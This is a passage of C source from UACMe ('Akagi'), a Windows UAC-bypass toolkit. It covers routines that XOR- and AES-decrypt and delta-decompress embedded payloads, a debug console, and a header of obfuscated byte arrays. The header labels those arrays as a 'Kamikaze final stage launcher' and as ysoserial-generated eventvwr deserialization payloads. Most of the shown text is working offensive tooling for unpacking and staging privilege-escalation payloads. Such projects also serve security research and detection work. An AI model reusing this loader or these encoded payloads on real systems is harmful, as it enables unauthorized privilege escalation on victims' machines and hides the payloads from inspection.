    k = Key;
    c = BufferSize;
    ptr = (PUCHAR)Buffer;

    do {
        *ptr ^= k;
        k = _rotl(k, 1);
        ptr++;
        --c;
    } while (c != 0);
}

/*
* SelectSecretFromBlob
*
* Purpose:
*
* Return key used for decryption by Id from secrets blob.
*
* Use supHeapFree to release allocated result.
*
*/
PVOID SelectSecretFromBlob(
    _In_ ULONG Id,
    _Out_ PDWORD pcbKeyBlob
)
{
    ULONG i, c;
    ULONG dataSize = 0;
    PDCK_HEADER secretsBlob;
    PVOID pbSecret = NULL, resourceBlob;

    if (pcbKeyBlob)
        *pcbKeyBlob = 0;

    resourceBlob = supLdrQueryResourceData(SECRETS_ID, g_hInstance, &dataSize);
    if (resourceBlob) {

        secretsBlob = (PDCK_HEADER)supHeapAlloc(dataSize);
        if (secretsBlob) {

            RtlCopyMemory(secretsBlob, resourceBlob, dataSize);
            EncodeBuffer(secretsBlob, dataSize, AKAGI_XOR_KEY);

            c = dataSize / sizeof(DCK_HEADER);
            for (i = 0; i < c; i++) {
                if (secretsBlob[i].Id == Id) {

                    pbSecret = supHeapAlloc(UACME_KEY_SIZE);
                    if (pbSecret != NULL) {
                        RtlCopyMemory(pbSecret, secretsBlob[i].Data, UACME_KEY_SIZE);
                        if (pcbKeyBlob)
                            *pcbKeyBlob = UACME_KEY_SIZE;
                    }
                    break;
                }
            }

            RtlSecureZeroMemory(secretsBlob, dataSize);
            supHeapFree(secretsBlob);
        }
    }

    return pbSecret;
}

/*
* IsValidContainerHeader
*
* Purpose:
*
* Basic sanity checks over container header.
*
*/
BOOL IsValidContainerHeader(
    _In_ PDCU_HEADER UnitHeader,
    _In_ DWORD FileSize
)
{
    DWORD HeaderCrc;

    if (UnitHeader == NULL)
        return FALSE;

    __try {

        if ((UnitHeader->Magic != UACME_CONTAINER_PACKED_DATA) && //Naka
            (UnitHeader->Magic != UACME_CONTAINER_PACKED_UNIT) && //Naka
            (UnitHeader->Magic != UACME_CONTAINER_PACKED_CODE) && //Kuma
            (UnitHeader->Magic != UACME_CONTAINER_PACKED_KEYS))   //Kuma
        {
            return FALSE;
        }

        //
        // Note that IV has different meaning in Kuma containers.
//
        HeaderCrc = UnitHeader->HeaderCrc;
        UnitHeader->HeaderCrc = 0;
        if (RtlComputeCrc32(0, UnitHeader, sizeof(DCU_HEADER)) != HeaderCrc) {
            UnitHeader->HeaderCrc = HeaderCrc;
            return FALSE;
        }
        UnitHeader->HeaderCrc = HeaderCrc;

        if ((UnitHeader->cbData == 0) || (UnitHeader->cbDeltaSize == 0))
            return FALSE;

        //
        // The payload starts right after the header, so it has to fit into
        // whatever remains of the file once the header itself is accounted for.
        //
        if (FileSize < sizeof(DCU_HEADER))
            return FALSE;

        if (UnitHeader->cbData > FileSize - sizeof(DCU_HEADER))
            return FALSE;

        if (UnitHeader->cbDeltaSize > FileSize)
            return FALSE;

        if (UnitHeader->cbDeltaSize > UnitHeader->cbData)
            return FALSE;

    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        return FALSE;
    }

    return TRUE;
}

/*
* DecryptBuffer
*
* Purpose:
*
* Decrypt AES encrypted buffer.
*
* Use supVirtualFree to release allocated result.
*
*/
BOOL DecryptBuffer(
    _In_ PBYTE pbBuffer,
    _In_ DWORD cbBuffer,
    _In_ PBYTE pbIV,
    _In_ PBYTE pbSecret,
    _In_ DWORD cbSecret,
    _Out_ PBYTE *pbDecryptedBuffer,
    _Out_ PDWORD pcbDecryptedBuffer
)
{
    BOOL bResult = FALSE;
    BCRYPT_ALG_HANDLE hAlgAes = NULL;
    BCRYPT_KEY_HANDLE hKey = NULL;
    HANDLE heapCNG = NULL;
    DWORD cbCipherData, cbKeyObject, cbResult, cbBlockLen;
    PBYTE pbKeyObject = NULL, pbCipherData = NULL;
    SIZE_T memIO;
    NTSTATUS status;

    do {

        heapCNG = HeapCreate(0, 0, 0);
        if (heapCNG == NULL)
            break;

        if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(
            &hAlgAes,
            BCRYPT_AES_ALGORITHM,
            NULL,
            0)))
        {
            break;
        }

        cbKeyObject = 0;
        cbResult = 0;
        if (!NT_SUCCESS(BCryptGetProperty(
            hAlgAes,
            BCRYPT_OBJECT_LENGTH,
            (PUCHAR)&cbKeyObject,
            sizeof(DWORD),
            &cbResult,
            0)))
        {
            break;
        }

        pbKeyObject = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbKeyObject);
        if (pbKeyObject == NULL)
            break;

        cbBlockLen = 0;
        if (!NT_SUCCESS(BCryptGetProperty(hAlgAes,
            BCRYPT_BLOCK_LENGTH,
            (PUCHAR)&cbBlockLen,
            sizeof(DWORD),
            &cbResult,
            0)))
        {
            break;
        }

        if (cbBlockLen > DCU_IV_MAX_BLOCK_LENGTH)
            break;

        if (!NT_SUCCESS(BCryptGenerateSymmetricKey(
            hAlgAes,
            &hKey,
            pbKeyObject,
            cbKeyObject,
            pbSecret,
            cbSecret,
            0)))
        {
            break;
        }

        //
        // First call with a NULL output buffer only queries the required size.
        //
        cbCipherData = 0;
        if (!NT_SUCCESS(BCryptDecrypt(
            hKey,
            pbBuffer,
            cbBuffer,
            NULL,
            pbIV,
            cbBlockLen,
            NULL,
            0,
            &cbCipherData,
            BCRYPT_BLOCK_PADDING)))
        {
            break;
        }
memIO = (SIZE_T)cbCipherData;
        pbCipherData = (PBYTE)supVirtualAlloc(
            &memIO,
            DEFAULT_ALLOCATION_TYPE,
            DEFAULT_PROTECT_TYPE,
            &status);

        if ((!NT_SUCCESS(status)) || (pbCipherData == NULL))
            break;

        cbResult = 0;
        if (!NT_SUCCESS(BCryptDecrypt(
            hKey,
            pbBuffer,
            cbBuffer,
            NULL,
            pbIV,
            cbBlockLen,
            pbCipherData,
            cbCipherData,
            &cbResult,
            BCRYPT_BLOCK_PADDING)))
        {
            break;
        }

        BCryptDestroyKey(hKey);
        hKey = NULL;

        *pbDecryptedBuffer = pbCipherData;
        *pcbDecryptedBuffer = cbCipherData;

        bResult = TRUE;

    } while (FALSE);

    if (hKey != NULL)
        BCryptDestroyKey(hKey);

    if (hAlgAes != NULL)
        BCryptCloseAlgorithmProvider(hAlgAes, 0);

    if (heapCNG)
        HeapDestroy(heapCNG);

    if (bResult == FALSE) {
        if (pbCipherData)
            supVirtualFree(pbCipherData, NULL);

        *pbDecryptedBuffer = NULL;
        *pcbDecryptedBuffer = 0;
    }

    return bResult;
}

/*
* DecompressContainerUnit
*
* Purpose:
*
* Decompress given container.
*
* Use supVirtualFree to release allocated result.
*
*/
PVOID DecompressContainerUnit(
    _In_ PBYTE pbBuffer,
    _In_ DWORD cbBuffer,
    _In_ PBYTE pbSecret,
    _In_ DWORD cbSecret,
    _Out_ PULONG pcbDecompressed
)
{
    PDCU_HEADER UnitHeader;
    PBYTE pbDecryptedBuffer = NULL;
    DWORD cbDecryptedBuffer = 0;
    DELTA_INPUT diDelta, diSource;
    DELTA_OUTPUT doOutput;
    PVOID UncompressedData = NULL;
    SIZE_T memIO;
    PBYTE DataPtr;
    NTSTATUS status;

    if (pcbDecompressed)
        *pcbDecompressed = 0;

    do {

        UnitHeader = (PDCU_HEADER)pbBuffer;
        if (!IsValidContainerHeader(UnitHeader, cbBuffer))
            break;

        DataPtr = (PBYTE)UnitHeader + sizeof(DCU_HEADER);

        if (!DecryptBuffer(
            (PBYTE)DataPtr,
            (DWORD)UnitHeader->cbData,
            (PBYTE)UnitHeader->bIV,
            (PBYTE)pbSecret,
            (DWORD)cbSecret,
            (PBYTE*)&pbDecryptedBuffer,
            (PDWORD)&cbDecryptedBuffer))
        {
            break;
        }

        if (cbDecryptedBuffer > cbBuffer)
            break;

        //
        // The delta must lie entirely inside the decrypted buffer; the header
        // check only bounded it against cbData, not against the decrypted size.
        //
        if (UnitHeader->cbDeltaSize > cbDecryptedBuffer)
            break;

        RtlSecureZeroMemory(&diSource, sizeof(DELTA_INPUT));
        RtlSecureZeroMemory(&diDelta, sizeof(DELTA_INPUT));
        RtlSecureZeroMemory(&doOutput, sizeof(DELTA_OUTPUT));

        diDelta.Editable = FALSE;
        diDelta.lpcStart = pbDecryptedBuffer;
        diDelta.uSize = UnitHeader->cbDeltaSize;

        if
(ApplyDeltaB(DELTA_FILE_TYPE_RAW, diSource, diDelta, &doOutput)) {

            memIO = doOutput.uSize;
            UncompressedData = supVirtualAlloc(
                &memIO,
                DEFAULT_ALLOCATION_TYPE,
                DEFAULT_PROTECT_TYPE,
                &status);

            if ((NT_SUCCESS(status)) && (UncompressedData != NULL)) {
                RtlCopyMemory(UncompressedData, doOutput.lpStart, doOutput.uSize);
                if (pcbDecompressed)
                    *pcbDecompressed = (ULONG)doOutput.uSize;
            }

            DeltaFree(doOutput.lpStart);
        }

    } while (FALSE);

    if (pbDecryptedBuffer != NULL) {
        supVirtualFree(pbDecryptedBuffer, NULL);
    }

    return UncompressedData;
}

/*
* DecompressPayload
*
* Purpose:
*
* Decode payload and then decompress it.
*
*/
PVOID DecompressPayload(
    _In_ ULONG PayloadId,
    _In_ PVOID pbBuffer,
    _In_ ULONG cbBuffer,
    _Out_ PULONG pcbDecompressed
)
{
    BOOL bResult = FALSE;
    ULONG FinalDecompressedSize = 0;
    SIZE_T memIO;
    PUCHAR UncompressedData = NULL;
    PVOID Data = NULL;
    PBYTE pbSecret = NULL;
    DWORD cbSecret = 0, DataSize;
    NTSTATUS status;

    __try {

        DataSize = cbBuffer;

        do {
            //
            // Make a writeable buffer copy.
            //
            memIO = DataSize;
            Data = supVirtualAlloc(
                (PSIZE_T)&memIO,
                DEFAULT_ALLOCATION_TYPE,
                DEFAULT_PROTECT_TYPE,
                &status);

            if ((!NT_SUCCESS(status)) || (Data == NULL))
                break;

            supCopyMemory(Data, memIO, pbBuffer, DataSize);

            //
            // Get key for decryption.
            //
            pbSecret = (PBYTE)SelectSecretFromBlob(PayloadId, &cbSecret);
            if ((pbSecret == NULL) || (cbSecret == 0))
                break;

            UncompressedData = (PUCHAR)DecompressContainerUnit(
                (PBYTE)Data,
                DataSize,
                pbSecret,
                cbSecret,
                &FinalDecompressedSize);

            if (UncompressedData == NULL)
                break;

            //
            // Validate uncompressed data, skip for dotnet.
//
            if (!supVerifyMappedImageMatchesChecksum(UncompressedData, FinalDecompressedSize)) {
                if (!supIsCorImageFile(UncompressedData)) {
#ifdef _DEBUG
                    supDebugPrint(
                        TEXT("DecompressPayload"),
                        ERROR_DATA_CHECKSUM_ERROR);
#endif
                    break;
                }
            }

            bResult = TRUE;

        } while (FALSE);

    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        bResult = FALSE;
    }

    if (pbSecret)
        supHeapFree(pbSecret);

    if (Data) {
        supVirtualFree(Data, NULL);
    }

    if (bResult == FALSE) {
        if (UncompressedData != NULL) {
            supVirtualFree(UncompressedData, NULL);
            UncompressedData = NULL;
        }
        FinalDecompressedSize = 0;
    }

    if (pcbDecompressed)
        *pcbDecompressed = FinalDecompressedSize;

    return UncompressedData;
}

================================================
FILE: Source/Akagi/compress.h
================================================

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2022
*
*  TITLE:       COMPRESS.H
*
*  VERSION:     3.61
*
*  DATE:        22 Jun 2022
*
*  Prototypes and definitions for compression.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#pragma once

#include
#include
#include

#define UACME_CONTAINER_PACKED_UNIT 'UPCU' //Naka handling
#define UACME_CONTAINER_PACKED_DATA 'DPCU' //Naka handling
#define UACME_CONTAINER_PACKED_CODE 'CPCU' //Kuma handling
#define UACME_CONTAINER_PACKED_KEYS 'KPCU' //Kuma handling

//Initialization vector max bytes
#define DCU_IV_MAX_BLOCK_LENGTH 16

typedef struct _DCU_HEADER {
    DWORD Magic;
    DWORD cbData;
    DWORD cbDeltaSize;
    DWORD HeaderCrc;
    BYTE bIV[DCU_IV_MAX_BLOCK_LENGTH];
    //PBYTE pbData[1]; /* not a member of the structure */
} DCU_HEADER, *PDCU_HEADER;

typedef PVOID(*pfnDecompressPayload)(
    _In_ ULONG PayloadId,
    _In_ PVOID pbBuffer,
    _In_ ULONG cbBuffer,
    _Out_ PULONG pcbDecompressed);

PVOID DecompressPayload(
    _In_ ULONG PayloadId,
    _In_ PVOID pbBuffer,
    _In_ ULONG cbBuffer,
    _Out_ PULONG pcbDecompressed);

VOID EncodeBuffer(
    _In_ PVOID Buffer,
    _In_ ULONG BufferSize,
    _In_ ULONG Key);

================================================
FILE: Source/Akagi/console.c
================================================

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2022 - 2026
*
*  TITLE:       CONSOLE.C
*
*  VERSION:     3.69
*
*  DATE:        12 Feb 2026
*
*  Debug console.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "global.h"

HANDLE StdOutputHandle = NULL;
pswprintf_s _swprintf_s = NULL;

VOID ConsolePrint(
    _In_ LPCWSTR Message
)
{
    WriteConsole(StdOutputHandle, Message, (ULONG)_strlen(Message), NULL, NULL);
}

VOID ConsolePrintValueUlong(
    _In_ LPCWSTR Message,
    _In_ ULONG Value,
    _In_ BOOL Hexademical
)
{
    WCHAR szText[200];

    if (_swprintf_s) {
        _swprintf_s(szText, RTL_NUMBER_OF(szText),
            Hexademical ? TEXT("%ws 0x%lX\r\n") : TEXT("%ws %lu\r\n"),
            Message, Value);
        ConsolePrint(szText);
    }
}

VOID ConsolePrintStatus(
    _In_ LPCWSTR Message,
    _In_ NTSTATUS Status
)
{
    ConsolePrintValueUlong(Message, Status, TRUE);
}

VOID ConsoleInit(
    VOID
)
{
    WCHAR szBuffer[100];
    HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");

    if (hNtdll == NULL || !AllocConsole())
        return;

    _swprintf_s = (pswprintf_s)GetProcAddress(hNtdll, "swprintf_s");
    if (_swprintf_s == NULL)
        return;

    StdOutputHandle = GetStdHandle(STD_OUTPUT_HANDLE);
    SetConsoleMode(StdOutputHandle, ENABLE_PROCESSED_OUTPUT | ENABLE_VIRTUAL_TERMINAL_PROCESSING);

    _swprintf_s(szBuffer, RTL_NUMBER_OF(szBuffer),
        TEXT("[*] UACMe v%lu.%lu.%lu.%lu\r\n"),
        UCM_VERSION_MAJOR,
        UCM_VERSION_MINOR,
        UCM_VERSION_REVISION,
        UCM_VERSION_BUILD);

    SetConsoleTitle(szBuffer);
}

BOOL ConsoleIsKeyPressed(
    _In_ WORD VirtualKeyCode
)
{
    BOOL bResult = FALSE;
    DWORD numberOfEvents = 0;
    INPUT_RECORD inp1;
    HANDLE nStdHandle = GetStdHandle(STD_INPUT_HANDLE);

    GetNumberOfConsoleInputEvents(nStdHandle, &numberOfEvents);
    if (numberOfEvents) {
        PeekConsoleInput(nStdHandle, &inp1, 1, &numberOfEvents);
        bResult = (numberOfEvents != 0 &&
            inp1.EventType == KEY_EVENT &&
            inp1.Event.KeyEvent.bKeyDown &&
            inp1.Event.KeyEvent.wVirtualKeyCode == VirtualKeyCode);
        FlushConsoleInputBuffer(nStdHandle);
    }

    return bResult;
}

VOID ConsoleRelease(
    VOID
)
{
    DWORD dwStart = GetTickCount();
    HANDLE nStdHandle = GetStdHandle(STD_INPUT_HANDLE);

    if (nStdHandle == NULL || nStdHandle == INVALID_HANDLE_VALUE) {
        FreeConsole();
        return;
    }
ConsolePrint(TEXT("[+] Press Enter to exit or wait few seconds and it will close automatically\r\n"));

    FlushConsoleInputBuffer(nStdHandle);

    while (!ConsoleIsKeyPressed(VK_RETURN) && (GetTickCount() - dwStart) < (10 * 1000))
        Sleep(50);

    FreeConsole();
}

================================================
FILE: Source/Akagi/console.h
================================================

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2022
*
*  TITLE:       CONSOLE.H
*
*  VERSION:     3.62
*
*  DATE:        08 Jul 2022
*
*  Debug console header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#pragma once

VOID ConsoleInit(
    VOID);

VOID ConsoleRelease(
    VOID);

VOID ConsolePrintStatus(
    _In_ LPCWSTR Message,
    _In_ NTSTATUS Status);

VOID ConsolePrint(
    _In_ LPCWSTR Message);

VOID ConsolePrintValueUlong(
    _In_ LPCWSTR Message,
    _In_ ULONG Value,
    _In_ BOOL Hexademical);

#ifdef _UCM_CONSOLE
#define ucmConsoleInit ConsoleInit
#define ucmConsoleRelease ConsoleRelease
#define ucmConsolePrintStatus ConsolePrintStatus
#define ucmConsolePrint ConsolePrint
#define ucmConsolePrintValueUlong ConsolePrintValueUlong
#else
#define ucmConsoleInit()
#define ucmConsoleRelease()
#define ucmConsolePrintStatus(Message, Status)
#define ucmConsolePrint(Message)
#define ucmConsolePrintValueUlong(Message, Value, Hexademical)
#endif

================================================
FILE: Source/Akagi/encresource.h
================================================

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2016 - 2025
*
*  TITLE:       ENCRESOURCE.H
*
*  VERSION:     3.68
*
*  DATE:        07 Mar 2025
*
*  Encoded string resources.
* * 1) g_encodedKamikazeFinal - Kamikaze final stage launcher * 2) string table elements * 3) g_encodedRecentViews - eventvwr cache element generated with yososerial * 4) g_encodedRecentViewsV2 - eventvwr cache element for dotnet2 generated with ysoserial * 5) g_encodedTaskParamBegin, g_encodedTaskParamEnd - parameters data for the scheduler task * 6) g_webviewvsinfo - WebView version info block * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #pragma once static const unsigned char g_encodedKamikazeFinal[121] = { 0x46, 0x9C, 0x9D, 0xBE, 0xCA, 0x73, 0xA6, 0x57, 0x04, 0xB2, 0xD4, 0x65, 0x8A, 0x1E, 0xB8, 0xC4, 0x04, 0xAA, 0xC1, 0x55, 0xB3, 0xD5, 0x2E, 0xD0, 0x19, 0xB8, 0xCC, 0x37, 0x99, 0x2A, 0xA6, 0xD8, 0x19, 0x81, 0x9D, 0xB6, 0xF5, 0x25, 0xFF, 0x59, 0x07, 0x95, 0xC2, 0x36, 0xDB, 0x0C, 0xB5, 0xD2, 0x45, 0xF8, 0x90, 0x1F, 0xB3, 0xC0, 0x2A, 0x90, 0x37, 0x8A, 0xC2, 0x28, 0xDC, 0x41, 0xBB, 0xC5, 0x1F, 0xD6, 0xC5, 0xF1, 0x83, 0x3E, 0xE3, 0x46, 0x1F, 0xB3, 0xC0, 0x3F, 0xC4, 0x04, 0xAD, 0xD3, 0x48, 0xF8, 0x99, 0x49, 0xF4, 0x81, 0x78, 0xE7, 0x0E, 0xA5, 0xD9, 0x34, 0xC5, 0x0A, 0xBA, 0x9F, 0x53, 0xCF, 0xD5, 0xFC, 0xD5, 0x2E, 0xE8, 0x5C, 0x1B, 0xA2, 0x93, 0x67, 0x99, 0x0F, 0xB4, 0xD2, 0x14, 0xE4, 0x89, 0x44, 0xBE, 0xD9, 0x37, 0xD9, 0x55 }; static const unsigned char g_encodedRecentViews[1411] = { 0x7A, 0xF5, 0xE9, 0xD3, 0xA7, 0xB0, 0x61, 0xC2, 0x85, 0xF5, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF8, 0xEB, 0xD3, 0xA7, 0x4F, 0xD0, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xDA, 0x5C, 0x0E, 0x95, 0xC5, 0xF3, 0xF1, 0x2A, 0xEC, 0x4E, 0x13, 0x9B, 0x87, 0xEE, 0x93, 0x61, 0xAE, 0x13, 0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 0x51, 0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48, 0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48, 
0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69, 0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x2D, 0xA9, 0x0A, 0x1B, 0xC1, 0x8A, 0xE6, 0x91, 0x7E, 0xA7, 0x0E, 0x4E, 0x91, 0xD9, 0xEB, 0x9E, 0x4A, 0x9F, 0x3D, 0x7A, 0xF4, 0xFA, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xAD, 0xB2, 0xD3, 0x2E, 0xB0, 0x79, 0x1B, 0x80, 0x88, 0x80, 0xC2, 0x3B, 0x94, 0x3D, 0x7A, 0xF4, 0xFF, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x81, 0xC2, 0x22, 0xF1, 0x49, 0x13, 0x9A, 0x8E, 0x95, 0xC8, 0x3D, 0xF3, 0x5C, 0x0E, 0xE7, 0xAD, 0xB2, 0xD3, 0x2E, 0xCD, 0x58, 0x0E, 0xDA, 0xAD, 0xB2, 0xD3, 0x2E, 0xCD, 0x58, 0x0E, 0xBA, 0x88, 0xBE, 0xC2, 0x5E, 0xDA, 0x5C, 0x0E, 0x95, 0xBA, 0xB6, 0xD3, 0x61, 0xD0, 0x5C, 0x17, 0x91, 0x9A, 0xA3, 0xC6, 0x2C, 0xFB, 0x33, 0x3E, 0x95, 0x9D, 0xB2, 0xF4, 0x2A, 0xEA, 0x13, 0x2A, 0x86, 0x8C, 0xB5, 0xCE, 0x37, 0x8B, 0x79, 0x1B, 0x80, 0x88, 0x80, 0xC2, 0x3B, 0xB0, 0x7E, 0x1B, 0x87, 0x8C, 0x80, 0xC2, 0x21, 0xED, 0x54, 0x0E, 0x9D, 0x9F, 0xB6, 0xB5, 0x0B, 0xFF, 0x49, 0x1B, 0xA7, 0x8C, 0xA7, 0x89, 0x03, 0xF1, 0x5E, 0x1B, 0x98, 0x8C, 0x9F, 0xE4, 0x06, 0xDA, 0x27, 0x3E, 0x95, 0x9D, 0xB2, 0xF4, 0x2A, 0xEA, 0x13, 0x3F, 0x9A, 0x8F, 0xBC, 0xD5, 0x2C, 0xFB, 0x7E, 0x15, 0x9A, 0x9A, 0xA7, 0xD5, 0x2E, 0xF7, 0x53, 0x0E, 0x87, 0xF3, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x96, 0xDF, 0x3B, 0xFB, 0x53, 0x1E, 0x91, 0x8D, 0x83, 0xD5, 0x20, 0xEE, 0x58, 0x08, 0x80, 0x80, 0xB6, 0xD4, 0x5B, 0xDA, 0x5C, 0x0E, 0x95, 0xBA, 0xB6, 0xD3, 0x61, 0xCA, 0x5C, 0x18, 0x98, 0x8C, 0xA0, 0x89, 0x0C, 0xF1, 0x48, 0x14, 0x80, 0xF9, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x87, 0xC6, 0x2D, 0xF2, 0x58, 0x09, 0xAB, 0xD9, 0xD7, 0xA6, 0x4E, 0x9F, 0x3D, 0x7A, 0xF4, 0xEB, 0xD3, 0xA0, 0x50, 0xCD, 0x44, 0x09, 0x80, 0x8C, 0xBE, 0x89, 0x0B, 0xFF, 0x49, 0x1B, 0xDA, 0xBA, 0xB6, 0xD5, 0x26, 0xFF, 0x51, 0x13, 0x8E, 0x88, 0xA7, 0xCE, 0x20, 0xF0, 0x7B, 0x15, 0x86, 0x84, 0xB2, 0xD3, 0x4D, 0x9E, 0x3D, 0x7A, 0xF5, 0xE1, 0xD2, 0xAF, 0x4D, 0x9C, 0x3D, 0x7A, 0xF4, 0xEC, 0x2E, 0x58, 0xB0, 0x61, 0x22, 0x29, 0x8D, 0x9A, 0xA7, 0xC2, 
0x22, 0xB0, 0x79, 0x1B, 0x80, 0x88, 0xFD, 0xF4, 0x2A, 0xEC, 0x54, 0x1B, 0x98, 0x80, 0xA9, 0xC6, 0x3B, 0xF7, 0x52, 0x14, 0xB2, 0x86, 0xA1, 0xCA, 0x2E, 0xEA, 0x3C, 0x7A, 0xF4, 0xE9, 0xD4, 0xD1, 0x2E, 0xF2, 0x48, 0x1F, 0xAB, 0xB6, 0xD3, 0xAF, 0x4D, 0x9E, 0x3D, 0x7A, 0xF5, 0xE9, 0xD3, 0xA7, 0x49, 0x9A, 0x3D, 0x7A, 0xF4, 0xE9, 0xDA, 0xA3, 0x4F, 0x9E, 0x3D, 0x73, 0xF0, 0xE9, 0xD3, 0xA7, 0x4F, 0x97, 0x39, 0x7A, 0xF4, 0xE9, 0xD9, 0xA6, 0x4F, 0x9E, 0x3D, 0x73, 0xF1, 0xE9, 0xD3, 0xA7, 0x40, 0x9B, 0x3D, 0x7A, 0xF4, 0x7A, 0xD0, 0xA7, 0x4F, 0x9C, 0x3D, 0x7B, 0xF4, 0xE9, 0xD3, 0x58, 0xB0, 0x61, 0xC2, 0x7B, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x76, 0xF6, 0xE9, 0xD3, 0xA7, 0x11, 0xD3, 0x54, 0x19, 0x86, 0x86, 0xA0, 0xC8, 0x29, 0xEA, 0x13, 0x2A, 0x9B, 0x9E, 0xB6, 0xD5, 0x1C, 0xF6, 0x58, 0x16, 0x98, 0xC7, 0x96, 0xC3, 0x26, 0xEA, 0x52, 0x08, 0xD8, 0xC9, 0x85, 0xC2, 0x3D, 0xED, 0x54, 0x15, 0x9A, 0xD4, 0xE0, 0x89, 0x7F, 0xB0, 0x0D, 0x54, 0xC4, 0xC5, 0xF3, 0xE4, 0x3A, 0xF2, 0x49, 0x0F, 0x86, 0x8C, 0xEE, 0xC9, 0x2A, 0xEB, 0x49, 0x08, 0x95, 0x85, 0xFF, 0x87, 0x1F, 0xEB, 0x5F, 0x16, 0x9D, 0x8A, 0x98, 0xC2, 0x36, 0xCA, 0x52, 0x11, 0x91, 0x87, 0xEE, 0x94, 0x7E, 0xFC, 0x5B, 0x49, 0xCC, 0xDC, 0xE5, 0xC6, 0x2B, 0xAD, 0x0B, 0x4E, 0x91, 0xDA, 0xE6, 0xA2, 0x4E, 0x9E, 0x3D, 0x7A, 0xB6, 0xA4, 0xBA, 0xC4, 0x3D, 0xF1, 0x4E, 0x15, 0x92, 0x9D, 0xFD, 0xF1, 0x26, 0xED, 0x48, 0x1B, 0x98, 0xBA, 0xA7, 0xD2, 0x2B, 0xF7, 0x52, 0x54, 0xA0, 0x8C, 0xAB, 0xD3, 0x61, 0xD8, 0x52, 0x08, 0x99, 0x88, 0xA7, 0xD3, 0x26, 0xF0, 0x5A, 0x54, 0xA0, 0x8C, 0xAB, 0xD3, 0x09, 0xF1, 0x4F, 0x17, 0x95, 0x9D, 0xA7, 0xCE, 0x21, 0xF9, 0x6F, 0x0F, 0x9A, 0xB9, 0xA1, 0xC8, 0x3F, 0xFB, 0x4F, 0x0E, 0x9D, 0x8C, 0xA0, 0xA6, 0x4F, 0x9E, 0x3D, 0x75, 0xB2, 0x86, 0xA1, 0xC2, 0x28, 0xEC, 0x52, 0x0F, 0x9A, 0x8D, 0x91, 0xD5, 0x3A, 0xED, 0x55, 0x7B, 0xF6, 0xE9, 0xD3, 0xA7, 0x49, 0x9D, 0x3D, 0x7A, 0xF4, 0x5C, 0xD6, 0x9B, 0x70, 0xE6, 0x50, 0x16, 0xD4, 0x9F, 0xB6, 0xD5, 0x3C, 0xF7, 0x52, 0x14, 0xC9, 0xCB, 0xE2, 0x89, 0x7F, 0xBC, 0x1D, 0x1F, 0x9A, 
